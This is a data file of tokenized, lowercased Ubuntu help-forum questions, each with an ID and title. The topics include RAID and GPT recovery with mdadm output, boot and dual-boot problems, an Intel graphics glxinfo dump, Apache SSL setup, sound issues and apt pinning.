282498	copy a `` bad '' gpt partition table to another drive	i 'm trying to copy a gpt partition table . to make a long story short , i had a raid5 on 4 drives ( intel matrix storage manager , not linux software raid ) . what i have now is : 1 empty drive 2 drives with data but invalid partition tables & most likely superblocks 1 drive with data and valid partition table , without a superblock so the first thing i 'm trying to do is to copy the partition table from my last drive to the other two , so i can bring the array back to the degraded state ( somehow ) . i found this question : //askubuntu.com/questions/57908/how-can-i-quickly-copy-a-gpt-partition-scheme-from-one-hard-drive-to-another the problem is , that sgdisk -r=/dev/sdb /dev/sdd gives me `` warning ! disk size is smaller than the main header indicates ... blah blah blah ... invalid partition data ! '' when i go and try to use the expert options in gdisk and display the partition info of the last partition , it tells me it ends on 2.7tb ( which is the size of my array before it failed ) . any ideas ? : d edit : thanks for looking at this , results of `` mdadm -e '' below as requested sda = spare drive ( no data ) sdb/sdc = drives with bad partitioning sdd = drive with correct partitioning ( last in the array , not first ; the first one died and is replaced with spare sda ) i do n't think that what you 're saying is correct . if the partition table was written to the first disk only , the array would not function in degraded state whenever the first disk failed and therefore would provide no protection from a single ( first ) drive failure . root @ microknoppix : /home/knoppix # mdadm -e /dev/sda /dev/sda : magic : intel raid ism cfg sig . version : 1.3.00 orig family : bcce031b family : 1196c5cd generation : 0000003f attributes : all supported uuid : 1376fef0 : bf011589 : ccad5658 : c3e18e2c checksum : d221805f correct mpb sectors : 2 disks : 3 raid devices : 1 disk00 serial : 9vp2jcjm state : active id : 00010000 usable size : 1953520648 ( 931.51 gib 1000.20 gb ) [ r5v1 ] : uuid : f3de1ed4 : f7f28c69:488d1945:2e3d546f raid level : 5 members : 4 slots : [ uuuu ] failed disk : none this slot : 0 array size : 5860560896 ( 2794.53 gib 3000.61 gb ) per dev size : 1953520648 ( 931.51 gib 1000.20 gb ) sector offset : 0 num stripes : 7630939 chunk size : 128 kib reserved : 0 migrate state : idle map state : normal dirty state : clean disk01 serial : 6vp3mpcl state : active id : 00000003 usable size : 1953520648 ( 931.51 gib 1000.20 gb ) disk02 serial : 9vp248hs state : active id : 00000004 usable size : 1953520648 ( 931.51 gib 1000.20 gb ) root @ microknoppix : /home/knoppix # mdadm -e /dev/sdb /dev/sdb : magic : intel raid ism cfg sig . version : 1.3.00 orig family : bcce031b family : 1196c5cd generation : 0000003f attributes : all supported uuid : 1376fef0 : bf011589 : ccad5658 : c3e18e2c checksum : d221805f correct mpb sectors : 2 disks : 3 raid devices : 1 disk01 serial : 6vp3mpcl state : active id : 00000003 usable size : 1953520648 ( 931.51 gib 1000.20 gb ) [ r5v1 ] : uuid : f3de1ed4 : f7f28c69:488d1945:2e3d546f raid level : 5 members : 4 slots : [ uuuu ] failed disk : none this slot : 1 array size : 5860560896 ( 2794.53 gib 3000.61 gb ) per dev size : 1953520648 ( 931.51 gib 1000.20 gb ) sector offset : 0 num stripes : 7630939 chunk size : 128 kib reserved : 0 migrate state : idle map state : normal dirty state : clean disk00 serial : 9vp2jcjm state : active id : 00010000 usable size : 1953520648 ( 931.51 gib 1000.20 gb ) disk02 serial : 9vp248hs state : active id : 00000004 usable size : 1953520648 ( 931.51 gib 1000.20 gb ) root @ microknoppix : /home/knoppix # mdadm -e /dev/sdc /dev/sdc : magic : intel raid ism cfg sig . version : 1.3.00 orig family : bcce031b family : 1196c5cd generation : 0000003f attributes : all supported uuid : 1376fef0 : bf011589 : ccad5658 : c3e18e2c checksum : d221805f correct mpb sectors : 2 disks : 3 raid devices : 1 disk02 serial : 9vp248hs state : active id : 00000004 usable size : 1953520648 ( 931.51 gib 1000.20 gb ) [ r5v1 ] : uuid : f3de1ed4 : f7f28c69:488d1945:2e3d546f raid level : 5 members : 4 slots : [ uuuu ] failed disk : none this slot : 2 array size : 5860560896 ( 2794.53 gib 3000.61 gb ) per dev size : 1953520648 ( 931.51 gib 1000.20 gb ) sector offset : 0 num stripes : 7630939 chunk size : 128 kib reserved : 0 migrate state : idle map state : normal dirty state : clean disk00 serial : 9vp2jcjm state : active id : 00010000 usable size : 1953520648 ( 931.51 gib 1000.20 gb ) disk01 serial : 6vp3mpcl state : active id : 00000003 usable size : 1953520648 ( 931.51 gib 1000.20 gb ) root @ microknoppix : /home/knoppix # mdadm -e /dev/sdd /dev/sdd : magic : intel raid ism cfg sig . version : 1.3.00 orig family : bcce031b family : 1196c5cd generation : 0000003f attributes : all supported uuid : 1376fef0 : bf011589 : ccad5658 : c3e18e2c checksum : d221805f correct mpb sectors : 2 disks : 3 raid devices : 1 [ r5v1 ] : uuid : f3de1ed4 : f7f28c69:488d1945:2e3d546f raid level : 5 members : 4 slots : [ uuuu ] failed disk : none this slot : ? array size : 5860560896 ( 2794.53 gib 3000.61 gb ) per dev size : 1953520648 ( 931.51 gib 1000.20 gb ) sector offset : 0 num stripes : 7630939 chunk size : 128 kib reserved : 0 migrate state : idle map state : normal dirty state : clean disk00 serial : 9vp2jcjm state : active id : 00010000 usable size : 1953518862 ( 931.51 gib 1000.20 gb ) disk01 serial : 6vp3mpcl state : active id : 00000003 usable size : 1953518862 ( 931.51 gib 1000.20 gb ) disk02 serial : 9vp248hs state : active id : 00000004 usable size : 1953518862 ( 931.51 gib 1000.20 gb )
282500	how do i change icons in the dock `` plank '' ?	i 'm wondering how i change icons for specifically the dock `` plank '' . i 've only managed to find a way to change theme , but not icons for the actual applications in the dock . is it possible ? if so , how do you do it ? the problem is that i want to use faenza icons for as my usual icons , but another type of icons for my dock . the current version i 'm using is : 0.2.0.796 thanks in advance , phendrome
282508	networking and traffic routing question	hello i had a few of questions related to networking , let me list them in a logical order : 1 ) can multiple interfaces be bridged together so that it results in increased bandwidth ? 2 ) can wired and wireless interfaces be bridged together ? 3 ) if you have multiple interfaces ( both wired and wireless ) , which one would have higher precedence and where would all the traffic be routed to ? for the above questions , i 'm referring to a single linux based system . please try to explain in details if possible , i did n't find much resources else where to help me on this topic . also try to point towards reference material ( s ) where applicable . thanks .
282510	ubuntu 12.10 sometimes crashes when booting	i sometimes ( several times a week ) experience a complete crash when booting up ubuntu 12.10 ( 64-bit ) . not only gui fails to load , even hitting ctrl + alt + f1 does nothing , and i have to power off the machine . in some cases this has repeated for several times , until i have selected advanced options and choose an older kernel . after this the newest also boots normally for a while .
282512	how to move ubuntu 12.04lts from usb to hdd	firstly i 'd like to apologize if this sounds like a question already asked but the answers given were of no any help : / here 's my situation . i bought a usb key with ubuntu 12.04 lts from canonical . i partitioned a hdd on which windows 7 is . changed the booting order to 'external first ' . inserted my new usb and installed ubuntu . every time i want to use ubuntu i just have to plug in the usb . if i want to use w7 i just have to un-plug the usb . so far so good , i love ubuntu ! now though ... i want to stop pluging and un-pluging the usb . i 'd like to boot up and be presented with the grub on which i can just select what operating system i use without the usb as i do on another laptop i installed ubuntu with a cd . so i thing the right question is : how can i move the grub + ubuntu installation from the usb to the hdd without loosing any file or customization ? many thanks in advanced , eugene
282513	ubuntu wo n't let me boot back into windows after installing on surface pro	i installed ubuntu on my surface pro , on a completely separate partition from the main windows 8 partition . i took the same steps i normally do to dual boot on other machines , but now when i start the machine , instead of giving me options to use either os , it jumps right into ubuntu . how can i boot back into windows 8 ?
282515	creating a bootable 10.04.4 usb using universal usb installer	the website told me that the operating system i need for my new netbook is : ubuntu 10.04.4-desktop-i386.iso . i 'm using the universal usb-installer piece of software to put in on a usb that i can boot from ( my netbook currently does n't have an operating system ) does anybody know which version on the installer 's drop down list i should use ? ?
282518	graphics trouble on asus f55a-sx091d	i get system error reports all the time . it 's got to do with xorg . i 'm on ubuntu 12.04 64bit with all updates . arno @ arno-x55a : ~ $ lspci -nn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0106 ] ( rev 09 ) arno @ arno-x55a : ~ $ libgl_debug=verbose glxinfo name of display : :0 libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/tls/i965_dri.so libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/i965_dri.so libgl : ca n't open configuration file /etc/drirc : no such file or directory . libgl : ca n't open configuration file /home/arno/.drirc : no such file or directory . libgl : ca n't open configuration file /etc/drirc : no such file or directory . libgl : ca n't open configuration file /home/arno/.drirc : no such file or directory . display : :0 screen : 0 direct rendering : yes server glx vendor string : sgi server glx version string : 1.4 server glx extensions : glx_arb_create_context , glx_arb_create_context_profile , glx_arb_multisample , glx_ext_create_context_es2_profile , glx_ext_import_context , glx_ext_texture_from_pixmap , glx_ext_visual_info , glx_ext_visual_rating , glx_mesa_copy_sub_buffer , glx_oml_swap_method , glx_sgi_swap_control , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group , glx_intel_swap_event client glx vendor string : mesa project and sgi client glx version string : 1.4 client glx extensions : glx_arb_create_context , glx_arb_create_context_profile , glx_arb_create_context_robustness , glx_arb_get_proc_address , glx_arb_multisample , glx_ext_import_context , glx_ext_visual_info , glx_ext_visual_rating , glx_ext_framebuffer_srgb , glx_ext_create_context_es2_profile , glx_mesa_copy_sub_buffer , glx_mesa_multithread_makecurrent , glx_mesa_swap_control , glx_oml_swap_method , glx_oml_sync_control , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgi_video_sync , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group , glx_ext_texture_from_pixmap , glx_intel_swap_event glx version : 1.4 glx extensions : glx_arb_create_context , glx_arb_create_context_profile , glx_arb_get_proc_address , glx_arb_multisample , glx_ext_import_context , glx_ext_visual_info , glx_ext_visual_rating , glx_ext_create_context_es2_profile , glx_mesa_copy_sub_buffer , glx_mesa_multithread_makecurrent , glx_mesa_swap_control , glx_oml_swap_method , glx_oml_sync_control , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgi_video_sync , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group , glx_ext_texture_from_pixmap , glx_intel_swap_event opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) sandybridge mobile opengl version string : 3.0 mesa 9.0.3 opengl shading language version string : 1.30 opengl extensions : gl_arb_multisample , gl_ext_abgr , gl_ext_bgra , gl_ext_blend_color , gl_ext_blend_minmax , gl_ext_blend_subtract , gl_ext_copy_texture , gl_ext_polygon_offset , gl_ext_subtexture , gl_ext_texture_object , gl_ext_vertex_array , gl_ext_compiled_vertex_array , gl_ext_texture , gl_ext_texture3d , gl_ibm_rasterpos_clip , gl_arb_point_parameters , gl_ext_draw_range_elements , gl_ext_packed_pixels , gl_ext_point_parameters , gl_ext_rescale_normal , gl_ext_separate_specular_color , gl_ext_texture_edge_clamp , gl_sgis_generate_mipmap , gl_sgis_texture_border_clamp , gl_sgis_texture_edge_clamp , gl_sgis_texture_lod , gl_arb_framebuffer_srgb , gl_arb_multitexture , gl_ext_framebuffer_srgb , gl_ibm_multimode_draw_arrays , gl_ibm_texture_mirrored_repeat , gl_3dfx_texture_compression_fxt1 , gl_arb_texture_cube_map , gl_arb_texture_env_add , gl_arb_transpose_matrix , gl_ext_blend_func_separate , gl_ext_fog_coord , gl_ext_multi_draw_arrays , gl_ext_secondary_color , gl_ext_texture_env_add , gl_ext_texture_filter_anisotropic , gl_ext_texture_lod_bias , gl_ingr_blend_func_separate , gl_nv_blend_square , gl_nv_light_max_exponent , gl_nv_texgen_reflection , gl_nv_texture_env_combine4 , gl_sun_multi_draw_arrays , gl_arb_texture_border_clamp , gl_arb_texture_compression , gl_ext_framebuffer_object , gl_ext_texture_env_combine , gl_ext_texture_env_dot3 , gl_mesa_window_pos , gl_nv_packed_depth_stencil , gl_nv_texture_rectangle , gl_nv_vertex_program , gl_arb_depth_texture , gl_arb_occlusion_query , gl_arb_shadow , gl_arb_texture_env_combine , gl_arb_texture_env_crossbar , gl_arb_texture_env_dot3 , gl_arb_texture_mirrored_repeat , gl_arb_window_pos , gl_ati_envmap_bumpmap , gl_ext_stencil_two_side , gl_ext_texture_cube_map , gl_nv_depth_clamp , gl_nv_vertex_program1_1 , gl_apple_packed_pixels , gl_apple_vertex_array_object , gl_arb_draw_buffers , gl_arb_fragment_program , gl_arb_fragment_shader , gl_arb_shader_objects , gl_arb_vertex_program , gl_arb_vertex_shader , gl_ati_draw_buffers , gl_ati_texture_env_combine3 , gl_ati_texture_float , gl_ext_shadow_funcs , gl_ext_stencil_wrap , gl_mesa_pack_invert , gl_mesa_ycbcr_texture , gl_nv_primitive_restart , gl_arb_depth_clamp , gl_arb_fragment_program_shadow , gl_arb_half_float_pixel , gl_arb_occlusion_query2 , gl_arb_point_sprite , gl_arb_shading_language_100 , gl_arb_sync , gl_arb_texture_non_power_of_two , gl_arb_vertex_buffer_object , gl_ati_blend_equation_separate , gl_ext_blend_equation_separate , gl_oes_read_format , gl_arb_color_buffer_float , gl_arb_pixel_buffer_object , gl_arb_texture_compression_rgtc , gl_arb_texture_float , gl_arb_texture_rectangle , gl_ext_packed_float , gl_ext_pixel_buffer_object , gl_ext_texture_compression_rgtc , gl_ext_texture_rectangle , gl_ext_texture_srgb , gl_ext_texture_shared_exponent , gl_arb_framebuffer_object , gl_ext_framebuffer_blit , gl_ext_framebuffer_multisample , gl_ext_packed_depth_stencil , gl_apple_object_purgeable , gl_arb_vertex_array_object , gl_ati_separate_stencil , gl_ext_draw_buffers2 , gl_ext_draw_instanced , gl_ext_gpu_program_parameters , gl_ext_texture_array , gl_ext_texture_integer , gl_ext_texture_srgb_decode , gl_ext_timer_query , gl_oes_egl_image , gl_mesa_texture_array , gl_arb_copy_buffer , gl_arb_depth_buffer_float , gl_arb_draw_instanced , gl_arb_half_float_vertex , gl_arb_instanced_arrays , gl_arb_map_buffer_range , gl_arb_texture_rg , gl_arb_texture_swizzle , gl_arb_vertex_array_bgra , gl_ext_separate_shader_objects , gl_ext_texture_swizzle , gl_ext_vertex_array_bgra , gl_nv_conditional_render , gl_amd_draw_buffers_blend , gl_arb_es2_compatibility , gl_arb_blend_func_extended , gl_arb_debug_output , gl_arb_draw_buffers_blend , gl_arb_draw_elements_base_vertex , gl_arb_explicit_attrib_location , gl_arb_fragment_coord_conventions , gl_arb_provoking_vertex , gl_arb_sampler_objects , gl_arb_seamless_cube_map , gl_arb_shader_texture_lod , gl_arb_texture_rgb10_a2ui , gl_arb_uniform_buffer_object , gl_ext_provoking_vertex , gl_ext_texture_snorm , gl_mesa_texture_signed_rgba , gl_arb_robustness , gl_arb_shader_bit_encoding , gl_arb_texture_storage , gl_ext_transform_feedback , gl_arb_invalidate_subdata 40 glx visuals visual x bf lv rg d st colorbuffer sr ax dp st accumbuffer ms cav id dep cl sp sz l ci b ro r g b a f gb bf th cl r g b a ns b eat -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0x021 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x022 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x09d 24 tc 0 24 0 r . . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x09e 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x09f 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x0a0 24 tc 0 24 0 r . . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x0a1 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x0a2 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x0a3 24 tc 0 32 0 r . . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x0a4 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x0a5 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x0a6 24 tc 0 32 0 r . . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x0a7 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x0a8 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x0a9 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x0aa 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x0ab 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 4 1 none 0x0ac 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 4 1 none 0x0ad 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 4 1 none 0x0ae 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 4 1 none 0x0af 24 dc 0 24 0 r . . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x0b0 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x0b1 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x0b2 24 dc 0 24 0 r . . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x0b3 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x0b4 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x0b5 24 dc 0 32 0 r . . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x0b6 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x0b7 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x0b8 24 dc 0 32 0 r . . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x0b9 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x0ba 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x0bb 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x0bc 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x0bd 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x0be 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 4 1 none 0x0bf 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 4 1 none 0x0c0 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 4 1 none 0x0c1 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 4 1 none 0x060 32 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 60 glxfbconfigs : visual x bf lv rg d st colorbuffer sr ax dp st accumbuffer ms cav id dep cl sp sz l ci b ro r g b a f gb bf th cl r g b a ns b eat -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0x061 0 tc 0 16 0 r . . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x062 0 tc 0 16 0 r y . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x063 0 tc 0 16 0 r y . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x064 0 tc 0 16 0 r . . 5 6 5 0 . . 0 16 0 0 0 0 0 0 0 none 0x065 0 tc 0 16 0 r y . 5 6 5 0 . . 0 16 0 0 0 0 0 0 0 none 0x066 0 tc 0 16 0 r y . 5 6 5 0 . . 0 16 0 0 0 0 0 0 0 none 0x067 24 tc 0 24 0 r . . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x068 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x069 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x06a 24 tc 0 24 0 r . . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x06b 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x06c 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x06d 24 tc 0 32 0 r . . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x06e 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x06f 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x070 24 tc 0 32 0 r . . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x071 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x072 32 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x073 0 tc 0 16 0 r y . 5 6 5 0 . . 0 16 0 0 0 0 0 0 0 none 0x074 0 tc 0 16 0 r y . 5 6 5 0 . . 0 16 0 16 16 16 0 0 0 slow 0x075 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x076 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x077 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x078 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x079 0 tc 0 16 0 r y . 5 6 5 0 . . 0 0 0 0 0 0 0 4 1 none 0x07a 0 tc 0 16 0 r y . 5 6 5 0 . . 0 16 0 0 0 0 0 4 1 none 0x07b 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 4 1 none 0x07c 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 4 1 none 0x07d 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 4 1 none 0x07e 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 4 1 none 0x07f 0 dc 0 16 0 r . . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x080 0 dc 0 16 0 r y . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x081 0 dc 0 16 0 r y . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x082 0 dc 0 16 0 r . . 5 6 5 0 . . 0 16 0 0 0 0 0 0 0 none 0x083 0 dc 0 16 0 r y . 5 6 5 0 . . 0 16 0 0 0 0 0 0 0 none 0x084 0 dc 0 16 0 r y . 5 6 5 0 . . 0 16 0 0 0 0 0 0 0 none 0x085 24 dc 0 24 0 r . . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x086 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x087 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x088 24 dc 0 24 0 r . . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x089 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x08a 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x08b 24 dc 0 32 0 r . . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x08c 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x08d 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x08e 24 dc 0 32 0 r . . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x08f 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x090 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x091 0 dc 0 16 0 r y . 5 6 5 0 . . 0 16 0 0 0 0 0 0 0 none 0x092 0 dc 0 16 0 r y . 5 6 5 0 . . 0 16 0 16 16 16 0 0 0 slow 0x093 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x094 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x095 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x096 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x097 0 dc 0 16 0 r y . 5 6 5 0 . . 0 0 0 0 0 0 0 4 1 none 0x098 0 dc 0 16 0 r y . 5 6 5 0 . . 0 16 0 0 0 0 0 4 1 none 0x099 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 4 1 none 0x09a 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 4 1 none 0x09b 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 4 1 none 0x09c 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 4 1 none x server log file : http : //pastebin.ubuntu.com/5612088/
282526	how to repair a broken compiler ?	few months ago i was using gcc 4.6 . in order to get c++11 functionality i upgraded to gcc 4.7 using a ppa . today gcc 4.7 was recommended to me through the update manager . i just mindlessly clicked `` install all available updates '' . now when i try to build my project in c++ , i get the following error : the first thing that came to my mind was to uninstall gcc and install it again through the synaptic package manager . but something tells me that things may not be as straightforward as it seems . compiler is an essential part of the os and i am afraid i can lose the capacity to install anything . i remember that when i was upgrading to gcc 4.7 from gcc 4.6 things were also not so trivial . please , where can i find more information on the subject ? is it ok to just reinstall the gcc using synaptic ?
282529	how can i configure apache2 for ssl and install a ssl certificate ?	i have a ssl certificate issued by godaddy . i already have a website up for ecommerce , and need to secure it . i have tried everything to configure apache2 , and install the ssl , but i can not do it ! its stumping me ! one thing i tried was : i have enabled ssl in apache . i have generated a csr , and got a godaddybundle.crt and a crt for the site . i have tried placing them in the ssl files in my apache folder . i have to be honest ... .i am a serious novice when it comes to this . i have never dealt with ssl .
282530	why does my internet connection switch on and off ?	my internet works for a couple minutes when the computer turns on then it says ca n't connect to servers and my downloads stop . i am running 12.10 and i am using a asus usb n13 to connect to the internet . the weird thing is it says i am still connected .
282537	is there any way i can install windows games on ubuntu ?	i recently switched to linux from windows and really like ubuntu but i have alot of windows games i ca n't play anymore .
282539	occasional network connection time-outs	i have a server running lucid lynx and either not accepting connections or dropping connections periodically . there 's no log entries except those that show the symptoms . we see this happening with a local test application accessing a web page , as well as with the puppet configuration tool . i reloaded the web server , but without effect . i do n't know how i am to debug the network stack ; there 's no log entries about the network events and alarms . i feel fairly certain that there is a kernel tcp parameter that will fix this , but i do n't know where to start . can someone help ? the local test application can access another server running same software except using red hat enterprise 5 - and doing it very well .
282540	turn off my touchpad ubuntu 12.10	i am not a fan of the trackpad/touchpad and i want to turn it off while using ubuntu and i ca n't figure out how . i have a dell inspiron n5110 running windows 8 with a dual boot option of ubuntu 12.10 . the dell touchpad properties show : `` driver '' driver provider : alps driver date : 7/12/12 driver version : 8.1200.101.209 digital signer : microsoft windows hardware compatibility publisher `` general '' device type : mice and other pointing devices manufacturer : alps electric location : plugged into ps/2 mouse port in windows 8 the fn shortcut is fn+f3 and that works but in ubuntu it does not , even though a red box appears in the top right corner indicating it may have . it shows a trackpad icon with an x when the fn key are pressed . when i go into system settings , there is only a tab for mouse and nothing for the touchpad . i 've tried several methods listed here and nothing seems to work .
282545	no sound unless alsa-utils reinstalled	i am struggling with no sound problem on ubuntu 12.04 and now on 12.10 . i went through a lot of forums mentioning this issue and i have tried a lot of different solutions that worked for others but not for me . there is no sound from speakers unless i do sudo aptitude reinstall alsa-utils after reboot everything is working fine but after another reboot there is no sound again . so if i wanted to have the audio output on the next boot i have to reinstall alsa-utils before shutting down the system : ) i have tried to install alsa-utils not from repository but from the developers site but it did not help , do you have an idea where could be the problem and why the sound works only for the first time the system is on ? if it helps here is output from aplay -l : **** seznam playback hardwarových zařízení **** + karta 0 : intel [ hda intel ] , zařízení 0 : alc271x analog [ alc271x analog ] podzařízení : 1/1 podzařízení # 0 : subdevice # 0 + karta 0 : intel [ hda intel ] , zařízení 1 : alc271x digital [ alc271x digital ] podzařízení : 1/1 podzařízení # 0 : subdevice # 0
282548	does libreoffice writer or any other word processor support inline equations ?	a feature of word 2010 i love is the capability of inserting truly inline mathematical equations . by `` truly inline '' i mean that for all intents and purposes , editing or adding a mathematical formula feels like editing or typing regular text , all in place . no `` insert object '' or `` insert formula '' or such things . this is one of the reasons i still use windows . can i get this functionality in ubuntu , eg in libreoffice , as well ?
282551	pinning a : i386 package	i have gcc-4.7 installed from the ubuntu-toolchain-r ppa . since gcc-4.8 was recently added to that ppa , i 've run into a problem . acroread wants libstdc++6 : i386 , but i ca n't figure out how to pin that to gcc-4.7 . if i run apt-cache policy i get this : apt-cache policy libstdc++6 : i386 libstdc++6 : i386 : installed : ( none ) candidate : 4.6.3-1ubuntu5 version table : 4.8.0-3ubuntu3~12.04 0 -10 http : //our-mirror.example.com/repository/ubuntu-toolchain-r/test/ubuntu/ precise/main i386 packages 4.6.3-1ubuntu5 0 500 http : //our-mirror.example.com/repository/ubuntu/ precise/main i386 packages anyone know how to pin a i386 package ?
282558	how do i trigger a script to re-run every time there is a kernel upgrade ?	say , for example , i have a custom kernel module . is there a way to trigger a rebuild on every kernel upgrade in a generic way such that i can perform an arbitrary task ( recompile the kernel module ) on every kernel upgrade ?
